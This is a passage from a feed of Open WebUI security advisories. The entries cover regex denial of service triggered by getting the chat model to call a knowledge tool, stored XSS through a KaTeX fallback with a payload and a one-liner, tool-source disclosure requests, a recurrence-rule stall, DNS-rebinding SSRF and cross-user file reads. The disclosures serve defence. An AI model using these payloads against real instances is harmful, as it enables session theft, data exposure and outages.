permission.\n- One file the attacker can read. `USER_PERMISSIONS_CHAT_FILE_UPLOAD` defaults to true and a user always has read access to their own upload, so both halves of the input are attacker-supplied.\n- A model willing to call the tool with the attacker's literal pattern. This is the one non-deterministic step: it is reliable in practice by instructing the model in your own chat, but it is not guaranteed on a given turn.\n- Deployments running with `UVICORN_WORKERS` at its default of 1 lose the whole instance; multi-worker deployments lose one worker per request.\n\n## Impact\nAvailability, against every other user of the affected worker. Cost scales exponentially with the length of the matching text: measured on the vulnerable code, a 24 character subject takes 1.2s, 28 takes 19s and 30 takes 74s, and a 40 character subject extrapolates to roughly a day of CPU. The same subject against a literal pattern takes under a microsecond. There is no confidentiality or integrity effect, and no data is read or altered.\n\n## Fix\nFixed in 0.11.0 by https://github.com/open-webui/open-webui/pull/27471. Pattern matching moved from `re` to the `regex` engine, which supports a per-search timeout, and every tool call now runs its searches under a single 2 second matching budget, after which the tool returns an error instead of continuing to match. Upgrading is sufficient; there is nothing an operator has to configure.\n\n## Root cause\n- `backend/open_webui/tools/knowledge_fs.py`, `build_matcher`: compiled the caller's pattern and returned an unbounded match function.\n- `backend/open_webui/tools/builtin.py`, `grep_knowledge_files`: the default-configuration caller, which ran that matcher over every line of every reachable file.\n\n`build_matcher` treated any pattern containing regex metacharacters as a regex, so no explicit flag was needed to reach the compiler. From there the only limits in place were on results, not on work: a cap on matches returned and a cap on files scanned, neither of which bounds the time a single line can consume. Backtracking cost is exponential in the length of the matched text rather than in the pattern, so capping pattern length or line length would not have bounded it either. The engine had no timeout available and none was imposed elsewhere.\n\n## Proof of concept\nAgainst a real instance as an ordinary user:\n\n1. Upload a text file whose content is a single line of 30 `x` characters, and no `y`.\n2. In a chat on a model with the knowledge tools available, instruct the model to call `grep_knowledge_files` with the pattern `(x|x)*y` and that file's id.\n3. The request never returns. The worker's CPU sits at 100% for the duration, and concurrent requests from other users on the same worker do not complete.\n\nGrowth measured directly against `build_matcher` on the vulnerable code:\n\n| subject length | time  |\n| -------------- | ----- |\n| 16             | 4.7ms |\n| 20             | 73ms  |\n| 24             | 1.21s |\n| 28             | 19.3s |\n| 30             | 73.9s |\n\n## Credits\n@Classic298, for the finding and the fix.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-08-04T20:56:23.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-2f54-p244-32q6","https://github.com/open-webui/open-webui/pull/27471","https://github.com/open-webui/open-webui/commit/3ab2026262ef6f09810e4d235c5f9a9cb903e595","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-2f54-p244-32q6"],"source_kind":"github","identifiers":["GHSA-2f54-p244-32q6","CVE-2026-70493"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T21:00:21.477Z","updated_at":"2026-09-03T03:00:45.095Z","epss_percentage":0.00305,"epss_percentile":0.22806,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yZjU0LXAyNDQtMzJxNs4ABhS4","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yZjU0LXAyNDQtMzJxNs4ABhS4","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.9.6, \u003c 0.11.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yZjU0LXAyNDQtMzJxNs4ABhS4/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wd3hoLTczNTgtanEyeM4ABhS3","url":"https://github.com/advisories/GHSA-pwxh-7358-jq2x","title":"Open WebUI: Stored XSS via unescaped KaTeX render-error fallback in rendered messages","description":"## Summary\nAny authenticated user can store a chat message whose math block makes KaTeX fail with a stack overflow instead of a parse error. When that happens the renderer falls back to inserting the original math source into the page as HTML rather than as text, so script in the message runs in the browser of whoever views it. Every surface that renders messages is affected, including shared chats and channels, and the missing control is output escaping on the error path.\n\n## Preconditions\nDefault configuration, no flags involved. The attacker needs a normal user account and a way to get the target to open the content: a shared chat link, a channel the target reads, or any other message surface. No admin rights and no non-default settings are required on either side.\n\n## Impact\nScript executes in the viewer's browser on the Open WebUI origin, which puts the session token in localStorage within reach and therefore allows taking over the viewing account. If the viewer is an administrator, that is administrator access to the instance. Exploitation needs the target to open the content, but nothing beyond that: no interaction with the message itself. Server-side data and availability are unaffected; the impact is entirely in the viewer's browser session.\n\n## Fix\nFixed in 0.11.0 by commit bc600d3f0 (PR #26718). The error path now HTML-escapes the math source before it reaches the DOM, so a failed render displays the formula as text instead of as markup. Upgrading fully resolves the issue; no configuration change is needed.\n\n## Root cause\nAffected component: `src/lib/components/chat/Messages/Markdown/KatexRenderer.svelte`, the reactive block that renders math and its `catch` branch. Affected setup: releases 0.10.0 through 0.10.2, which are the versions carrying that fallback.\n\nKaTeX was called with `throwOnError: false`, which suppresses parse errors but not a `RangeError` from deeply nested input. The surrounding `catch` treated any failure as \"show the original formula\" and assigned the untouched source to the value that the template inserts with `{@html}`. Because the Markdown math tokenizer captures everything between the delimiters verbatim, including angle brackets and complete tags, the attacker controls that string exactly.\n\n## Proof of concept\nSend a chat message (or store one via any endpoint that writes message content) consisting of a single inline math block: an opening `$`, 100000 `{` characters, an `\u003cimg src=x onerror=alert(document.domain)\u003e` tag, 100000 `}` characters, and a closing `$`.\n\n```\npython3 -c 'N=100000; print(\"$\"+\"{\"*N+\"\u003cimg src=x onerror=alert(document.domain)\u003e\"+\"}\"*N+\"$\")'\n```\n\nOpen the chat as any user who can view it. KaTeX overflows the stack, the fallback inserts the raw source, and the `onerror` handler fires. Replacing `alert()` with a request carrying `localStorage.token` sends the viewer's session token to an attacker-controlled host; this was demonstrated against a shared chat opened by an administrator account.\n\n## Credits\n@maxntv — reported the unescaped KaTeX error fallback and demonstrated session-token theft through a shared chat.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-08-04T20:54:17.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-pwxh-7358-jq2x","https://github.com/open-webui/open-webui/pull/26718","https://github.com/open-webui/open-webui/commit/bc600d3f085802c45aa8f38c30e6e8c986bde6cc","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-pwxh-7358-jq2x"],"source_kind":"github","identifiers":["GHSA-pwxh-7358-jq2x","CVE-2026-70492"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T21:00:21.477Z","updated_at":"2026-09-03T03:00:45.096Z","epss_percentage":0.00276,"epss_percentile":0.1956,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wd3hoLTczNTgtanEyeM4ABhS3","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wd3hoLTczNTgtanEyeM4ABhS3","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.10.0, \u003c 0.11.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wd3hoLTczNTgtanEyeM4ABhS3/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zcjdnLXE2Y2ctcTJ2eM4ABhS2","url":"https://github.com/advisories/GHSA-3r7g-q6cg-q2vx","title":"Open WebUI: Tool source code disclosed to read-only users via the tool list and get endpoints","description":"## Summary\n\nA workspace tool shared with a read grant returned its full Python source to the recipient. Any authenticated non-admin who could use a shared tool could also read its source, including any user on the instance when a tool was shared publicly. Source is meant to be a writer-only tier: the list response schema deliberately omits it and source export sits behind its own permission. The read endpoints delivered it anyway.\n\n## Preconditions\n\n- Authentication enabled (`WEBUI_AUTH=true`, default) and plugins enabled (`ENABLE_PLUGINS=true`, default).\n- The attacker is an authenticated non-admin without the `workspace.tools` permission and without a write grant on the tool.\n- A tool is shared with a read grant to the attacker, to one of their groups, or to all users (`user:*`).\n\nDeployments that share no tools, or share them only with users who already hold write access, are not affected.\n\n## Impact\n\nA non-admin obtains another user's server-side tool source. Tool source commonly embeds hard-coded API keys, credentials and internal service URLs, so the practical loss frequently extends past the code itself. The attack needs no special permission beyond an ordinary account that a tool was shared with, and no user interaction. Confidentiality only: it grants no ability to create, modify or execute tools, and no integrity or availability impact.\n\n## Fix\n\nFixed in 0.11.0 by commit `c05de13b4` (#27005) together with `310ae9130`. The per-id endpoint now drops the source for callers without write access, and the two list endpoints no longer load source at all. Function specs stay visible to read users, since the chat tool listing renders a tool's functions from them. Tool execution loads source server-side, so shared tools keep working. Upgrading to 0.11.0 fully resolves the issue with no configuration change.\n\n## Root cause\n\nAffected components: `GET /api/v1/tools/`, `GET /api/v1/tools/list` and `GET /api/v1/tools/id/{id}` in `backend/open_webui/routers/tools.py`, and the response models in `backend/open_webui/models/tools.py`. Every build carrying the plugin routes is affected.\n\n`ToolResponse` deliberately omits the source and the specs, but its subclass `ToolUserResponse` permits extra fields, and each handler built its response by spreading a full dump of the tool model. The omitted fields were re-admitted as extras and serialised back to the caller, so the schema meant to enforce the writer-only tier enforced nothing at all. The listing path carried a second, independent defect: the flag that was supposed to keep source out of listings never changed the query it guarded.\n\n## Proof of concept\n\nAgainst a default instance on 0.10.2, with an admin account and a second account of role `user`:\n\n1. As the admin, create a tool whose source contains a marker secret and share it read-only with everyone:\n\n```\nPOST /api/v1/tools/create\n{\"id\": \"poctool\",\n \"name\": \"PoC Tool\",\n \"content\": \"API_KEY = \\\"TOOL_SRC_SECRET\\\"\\nclass Tools:\\n    def hello(self) -\u003e str: return 'hi'\",\n \"meta\": {\"description\": \"poc\"},\n \"access_grants\": [{\"principal_type\": \"user\", \"principal_id\": \"*\", \"permission\": \"read\"}]}\n```\n\n2. As the non-admin, call any of the three read endpoints:\n\n```\nGET /api/v1/tools/list\n-\u003e 200, item \"poctool\": write_access=false, content=\"API_KEY = \\\"TOOL_SRC_SECRET\\\" ...\"\n```\n\nThe same source is returned by `GET /api/v1/tools/` and `GET /api/v1/tools/id/poctool`. On 0.11.0 the identical run returns the item with no source for the non-admin, while the owner still receives it.\n\n## Credits\n\n- bogdancherniy11-sudo — reported the disclosure across the three tool read endpoints.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-08-04T20:51:41.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-3r7g-q6cg-q2vx","https://github.com/open-webui/open-webui/pull/27005","https://github.com/open-webui/open-webui/commit/c05de13b4fca1ac8a17153782b46b3d0aacf491c","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-3r7g-q6cg-q2vx"],"source_kind":"github","identifiers":["GHSA-3r7g-q6cg-q2vx","CVE-2026-70491"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T21:00:21.477Z","updated_at":"2026-09-03T03:00:45.097Z","epss_percentage":0.0026,"epss_percentile":0.17509,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zcjdnLXE2Y2ctcTJ2eM4ABhS2","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zcjdnLXE2Y2ctcTJ2eM4ABhS2","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003c= 0.10.2"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zcjdnLXE2Y2ctcTJ2eM4ABhS2/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01Z3BqLXZqMjMtdmhods4ABhS1","url":"https://github.com/advisories/GHSA-5gpj-vj23-vhhv","title":"Open WebUI: Unapproved accounts can open terminal sessions via a WebSocket auth path missing the role check","description":"## Summary\nThe terminal WebSocket route authenticates its own first-message JWT instead of going through the HTTP dependency chain, and never applies the role check that `get_verified_user` enforces on every HTTP terminal route. An account whose role is `pending`, meaning registered but not approved, or approved and later deactivated back to `pending`, can therefore open an interactive terminal session that the HTTP terminal endpoints would refuse. The missing control is the verified-user role gate, not the terminal access grants, which are evaluated correctly.\n\n## Preconditions\nAt least one terminal server must be configured, which is off by default, and its access grants must cover the account: either public read (`principal_id: \"*\"`) or a group the account still belongs to. The attacker needs a valid, unexpired JWT for a `pending` account and the terminal server id. Both are obtainable by an account that registered while approvals are pending, or by one that held access and was deactivated, since deactivation sets the role to `pending` without revoking the token, which lasts four weeks by default. Deployments with no terminal server configured, or whose terminal grants are admin-only, are not affected.\n\n## Impact\nA deployment loses the account-approval boundary for terminal access. An unapproved or deactivated account gets interactive shell access, file browsing and terminal-backed tooling in the terminal environment, for as long as its token remains valid. Because the HTTP terminal routes correctly reject the same account, the two planes disagree, so an administrator who deactivates a user sees access revoked over HTTP while the WebSocket keeps working. The terminal access grants themselves are not bypassed: an account with no grant is still refused, so this only widens access to terminals already shared broadly or with a group the account remains in.\n\n## Fix\nFixed in v0.11.0 by https://github.com/open-webui/open-webui/pull/27537. Token decoding, revocation checking, user lookup and the role check are consolidated into a single `get_verified_user_by_token` helper, and both the terminal WebSocket route and the Socket.IO handshake now go through it. The role set lives in one constant shared with the HTTP gate so the two cannot drift apart again. Upgrading fully resolves the issue; no configuration change is required.\n\n## Root cause\nAffected component: `backend/open_webui/routers/terminals.py`, the `_resolve_authenticated_connection` helper backing the `/{server_id}/api/terminals/{session_id}` WebSocket route. Affected setup: every build from v0.8.8 onward, since the route was introduced there.\n\nWebSocket handshakes cannot use FastAPI dependencies, so this route reimplemented authentication inline. The reimplementation reproduced the parts that are visible in the token, that it decodes and that the user row exists, and silently dropped the part that lives in the database row, the role check. Authorization then ran on two independent code paths with no shared definition of what an authenticated user is, and only one of them was updated when the role gate was introduced.\n\n## Credits\nReported by @rexpository.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-08-04T20:45:00.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-5gpj-vj23-vhhv","https://github.com/advisories/GHSA-5gpj-vj23-vhhv"],"source_kind":"github","identifiers":["GHSA-5gpj-vj23-vhhv","CVE-2026-70490"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T21:00:21.477Z","updated_at":"2026-09-03T03:00:45.097Z","epss_percentage":0.00207,"epss_percentile":0.1093,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01Z3BqLXZqMjMtdmhods4ABhS1","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01Z3BqLXZqMjMtdmhods4ABhS1","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.8.8, \u003c 0.11.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01Z3BqLXZqMjMtdmhods4ABhS1/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03M2NxLW1jZ2gtMzc5Y84ABhS0","url":"https://github.com/advisories/GHSA-73cq-mcgh-379c","title":"Open WebUI: Instance-wide stall via automation recurrence rules that force multi-second parsing","description":"## Summary\nIn every affected release, automation recurrence parsing anchors minutely and hourly rules at a fixed date of 2000-01-01 and then walks forward one interval at a time to find the next run. A single `FREQ=MINUTELY` rule therefore enumerates roughly a quarter-century of occurrences, synchronously, on the event loop that also serves the scheduler, HTTP and WebSocket traffic. Nothing bounds the walk, and nothing moves it off the loop.\n\n## Preconditions\nAny user who can create an automation. `USER_PERMISSIONS_FEATURES_AUTOMATIONS` defaults to `false`, so on a default deployment only an admin can reach the create path; it becomes reachable by ordinary users on any deployment that has granted the automations feature, which is the normal way to make the feature usable. `UVICORN_WORKERS` defaults to 1, so there is no second worker to absorb the stall. The rule needs no unusual syntax: `FREQ=MINUTELY` with no `DTSTART`, or with a `DTSTART` set well in the past, is enough.\n\n## Impact\nAvailability, against every other user of the instance. One evaluation of `RRULE:FREQ=MINUTELY` takes 18.9 s of blocking CPU; adding a ten-value `BYSECOND` list multiplies the walk and takes 64.2 s. `FREQ=HOURLY` costs 0.34 s and is not materially exploitable on its own. The cost does not stop at creation: once the automation is stored, the scheduler recomputes the next run for every claimed row on each poll, so the same walk repeats on a default 10 s interval and the instance stays wedged rather than recovering. Instances that have not enabled the automations feature for non-admin users are exposed only to an admin doing this.\n\n## Fix\nFixed in 0.11.0. Sub-daily rules are now anchored to the current clock instead of the year-2000 date, so the walk starts at the next occurrence rather than a quarter-century behind it. A caller-supplied `DTSTART` is honoured only when the number of occurrences it implies stays under a fixed bound, and is otherwise replaced by the clock-aligned anchor. The same rules that cost 18.9 s and 64.2 s now cost under a millisecond. Upgrading fully resolves the issue, no configuration change is required.\n\n## Root cause\nAffected component: `backend/open_webui/utils/automations.py`, `_parse_rule`, reached from the automation create, update and toggle handlers in `backend/open_webui/routers/automations.py` and from the scheduler's claim path in `backend/open_webui/models/automations.py`. Affected setup: every build from 0.9.0 onward, since that is when the automations feature shipped.\n\nThe fixed anchor existed to make sub-daily intervals snap to clock boundaries, so that \"every 5 minutes\" lands on :00, :05, :10 rather than drifting from whenever the automation happened to be created. Snapping only needs a reference point of the right phase, but the implementation used a literal far-past date as that reference and left the recurrence library to walk forward from it. The distance between the anchor and the present is therefore attacker-influenced work that grows with real time, and it was never treated as a cost that needed a bound or a thread.\n\n## Proof of concept\nMeasured cost of a single next-run computation against the shipped 0.10.2 parser:\n\n| rule | cost |\n| --- | --- |\n| `RRULE:FREQ=MINUTELY` | 18,880 ms |\n| `RRULE:FREQ=MINUTELY;BYSECOND=0,1,2,3,4,5,6,7,8,9` | 64,236 ms |\n| `DTSTART:20000101T000000` + `RRULE:FREQ=MINUTELY` | 26,237 ms |\n| `RRULE:FREQ=HOURLY` | 339 ms |\n\nMeasured at function level deliberately. Persisting such an automation has the scheduler repeat the walk on every poll and wedge the instance indefinitely, which is the actual impact but makes a live end-to-end run destructive to the test instance.\n\n## Credits\nReported by @Classic298.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-08-04T20:42:34.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-73cq-mcgh-379c","https://github.com/open-webui/open-webui/commit/c4ae8c86786fed521960466f6d8eef8af22c2946","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-73cq-mcgh-379c"],"source_kind":"github","identifiers":["GHSA-73cq-mcgh-379c","CVE-2026-70489"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T21:00:21.477Z","updated_at":"2026-09-03T03:00:45.098Z","epss_percentage":0.00295,"epss_percentile":0.21753,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03M2NxLW1jZ2gtMzc5Y84ABhS0","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03M2NxLW1jZ2gtMzc5Y84ABhS0","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.9.0, \u003c 0.11.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03M2NxLW1jZ2gtMzc5Y84ABhS0/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oNngyLTU4M2gteDk5cs4ABhSz","url":"https://github.com/advisories/GHSA-h6x2-583h-x99r","title":"Open WebUI: DNS Rebinding SSRF Bypass","description":"## Summary\nOpen WebUI vetted user-supplied URLs by resolving the hostname once and rejecting private, loopback and link-local addresses, then let the HTTP client resolve that hostname again at connect time. An attacker who controls the authoritative DNS for a hostname they submit can answer with a public address during the check and an internal one at connect, so the fetch reaches an address the check was meant to block. Every user-reachable fetch gated by that check was affected, and most of them hand the internal response back to the attacker.\n\n## Preconditions\n- An account on the instance. No admin rights and no non-default configuration.\n- Control of the authoritative DNS for a hostname the attacker submits, serving a TTL of 0 and alternating answers.\n- One of the affected entry points: URL ingest for retrieval, an `image_url` in a chat completion, image editing, or the OAuth profile-picture fetch.\n- The OAuth path additionally needs OAuth login configured and a picture claim (`OAUTH_PICTURE_CLAIM`, default `picture`) the user can influence, which is the case on self-service OIDC providers and providers with a user-editable avatar URL. On an existing account it also needs `OAUTH_UPDATE_PICTURE_ON_LOGIN`, which is off by default. Deployments without OAuth are not affected on that path; the other paths need no configuration at all.\n\n## Impact\nThe server can be made to issue requests to addresses only it can reach: cloud instance metadata such as 169.254.169.254, loopback-bound admin APIs, and internal network services. The response comes back to the attacker on most paths, as document content on the retrieval path, described by the vision model on the chat image path, and base64-encoded into the profile picture on the OAuth path; the image-edit path is blind. On the OAuth path the server also forwards the OAuth access token as a Bearer header to the fetched URL, so a rebind hands that token to the internal target. On a cloud host with IMDSv1 reachable this is enough to take instance IAM credentials.\n\nExploitation depends on winning the gap between the two resolutions, which the attacker influences but does not fully control. Admin-configured image-generation backends and the shared session pool are not affected and deliberately keep the default client, since an administrator may legitimately point those at an internal host.\n\n## Fix\nFixed in v0.11.0 (#24759, #25775, #25960, #26699). The check now happens at the connection layer instead of ahead of it: a `requests` transport adapter resolves the hostname once and connects to that same validated address, and an aiohttp resolver applies the same global-IP check, exposed as a one-off session used by every fetch behind the URL check. Upgrading to v0.11.0 resolves this with no configuration change.\n\n## Root cause\nAffected components:\n- retrieval web loader (`SafeWebBaseLoader`)\n- retrieval content probe (`get_content_from_url`)\n- chat image fetch (`get_image_base64_from_url`)\n- image edit fetch (`load_url_image`)\n- OAuth profile-picture fetch (`_process_picture_url`)\n\nThe URL check resolved the hostname and inspected the resulting IP, but nothing tied that decision to the connection that followed: the HTTP client resolved the name again on its own, and the second answer was never inspected. The check was therefore an opinion about a past lookup rather than a constraint on the actual connection, which is what a rebinding DNS server defeats. The first connection-layer guard covered only the retrieval loader, leaving the sibling probe, image and OAuth fetches on default clients until each was reported in turn.\n\n## Credits\n- @rezaduty — the rebinding time-of-check/time-of-use bypass and the retrieval loader path.\n- @nikchillz — the retrieval content-probe path.\n- @dhyabi2 — the chat `image_url` path, where the internal response is read back through the vision model.\n- @geo-chen — the image-edit path.\n- @bogdancherniy11-sudo — the OAuth profile-picture path, where the rebind also discloses the forwarded OAuth access token.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-08-04T20:38:34.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.3,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-h6x2-583h-x99r","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-h6x2-583h-x99r"],"source_kind":"github","identifiers":["GHSA-h6x2-583h-x99r","CVE-2026-54020"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T21:00:21.477Z","updated_at":"2026-09-03T03:00:45.098Z","epss_percentage":0.00213,"epss_percentile":0.11514,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oNngyLTU4M2gteDk5cs4ABhSz","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oNngyLTU4M2gteDk5cs4ABhSz","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003c= 0.10.2"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oNngyLTU4M2gteDk5cs4ABhSz/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02eGh2LXJ4aHYtcHdtNM4ABhSy","url":"https://github.com/advisories/GHSA-6xhv-rxhv-pwm4","title":"Open WebUI: Cross-user file content disclosure via request-scoped direct model knowledge metadata","description":"## Summary\nOpen WebUI lets a client define a model inline on a chat request instead of selecting a saved workspace model. The knowledge attached to such an inline model was used as-is, without checking that the caller can read what it points at. Any authenticated user who knows another user's file id could therefore have the builtin knowledge tools return that file's indexed content back to them.\n\n## Preconditions\nAuthenticated user of any role, no admin rights needed. The request must carry a session id and use native function calling, which is the default (only `function_calling: legacy` opts out), and the model's `builtin_tools` capability must not be disabled (default enabled). The attacker must already know the target file's id; ids are UUIDs and are not enumerable through this path. No admin setting needs to be turned on: enabling Direct Connections is not required for the backend to accept an inline model. Knowledge bases attached this way were never affected, their own access grants were enforced on every path.\n\n## Impact\nAn authenticated user could read the indexed chunks of another user's or group's file, a cross-user confidentiality loss limited to files whose ids the attacker already holds. It is read-only: nothing is modified or deleted, knowledge-base permissions are unaffected, and saved workspace models were already validated at creation time.\n\n## Fix\nFixed in 0.11.0 by commit 305880f2e. An inline model's attached knowledge is filtered against the caller's real read access before it is used, dropping any file, knowledge base or note the caller cannot read. Upgrading fully resolves it, no configuration change is required.\n\n## Root cause\nAffected component: the chat completion, chat completed and chat action endpoints, which accept an inline model definition, and the builtin knowledge tools that consume the model's attached knowledge. Affected setups: all builds from 0.8.8 through 0.10.2.\n\nSaved workspace models have their attached file references validated against the author when the model is created, updated or imported, so a stored model can only carry files its creator can read. An inline model never passes through that path, yet everything downstream treated its attached knowledge with the same trust, including a helper that grants read access to a file purely because the running model claims it as attached knowledge. The missing control was an access check at the point where client-supplied model metadata enters the request.\n\n## Credits\nReported by @whyiug.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-08-04T20:35:53.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-6xhv-rxhv-pwm4","https://github.com/open-webui/open-webui/commit/305880f2e2aeb2dda2f4b2a18a20bdcd558f7134","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-6xhv-rxhv-pwm4"],"source_kind":"github","identifiers":["GHSA-6xhv-rxhv-pwm4","CVE-2026-70487"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T21:00:21.478Z","updated_at":"2026-09-03T03:00:45.099Z","epss_percentage":0.0025,"epss_percentile":0.16125,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02eGh2LXJ4aHYtcHdtNM4ABhSy","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02eGh2LXJ4aHYtcHdtNM4ABhSy","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.8.8, \u003c= 0.10.2"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02eGh2LXJ4aHYtcHdtNM4ABhSy/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qeGM5LXhtYzQtZ3IyM84ABhSx","url":"https://github.com/advisories/GHSA-jxc9-xmc4-gr23","title":"Open WebUI: Deletion of directories and file embeddings in other knowledge bases via sync cleanup","description":"## Summary\nA user with write access to one knowledge base could delete directories, and drop file embeddings, belonging to knowledge bases they do not control. The sync cleanup endpoint verified write access on the knowledge base named in the URL and then acted on the directory and file ids supplied in the request body without checking that those objects belonged to that knowledge base.\n\n## Preconditions\nDefault configuration, no flags involved. The attacker needs write access to at least one knowledge base, which comes from owning one, from a write access grant, or from the admin role; `workspace.knowledge` is off by default, so an ordinary user cannot simply create one. They also need the victim's directory or file id, which are UUIDs and are not enumerable, so in practice the attacker is someone who can already see the target knowledge base, typically a read-only collaborator on a shared one. Deployments where no knowledge base is shared beyond its owner are not reachable.\n\n## Impact\nThe attacker deletes a target directory and, because the deletion runs without moving files to the parent, the knowledge_file associations for every file in that subtree are removed as well, so those documents silently drop out of the victim's knowledge base and out of its retrieval results. Separately, the per-file vector cleanup dropped the standalone `file-\u003cid\u003e` collection for any file id, breaking chat-with-file for that document. The stored files and their database rows survive, since that path was gated on file ownership, and an owner can restore the state by re-adding and reprocessing. Nothing about the target knowledge base's contents is disclosed to the attacker.\n\n## Fix\nFixed in https://github.com/open-webui/open-webui/pull/26722. Both request-body loops are now scoped to the knowledge base in the URL: a directory is resolved and skipped unless its `knowledge_id` matches, and the per-file vector cleanup runs only for files that are members of that knowledge base. Upgrading fully resolves the issue.\n\n## Root cause\nAffected component: `backend/open_webui/routers/knowledge.py`, handler `sync_knowledge_cleanup`, endpoint `POST /api/v1/knowledge/{id}/sync/cleanup`. Affected setup: all builds from 0.9.6 onward, no optional dependency involved.\n\nThe handler treated the write-access check on the URL knowledge base as authorization for everything it went on to do, but the objects it acted on came from the request body and were addressed by primary key alone. Directory deletion at the model layer deletes by directory id and has no notion of a parent 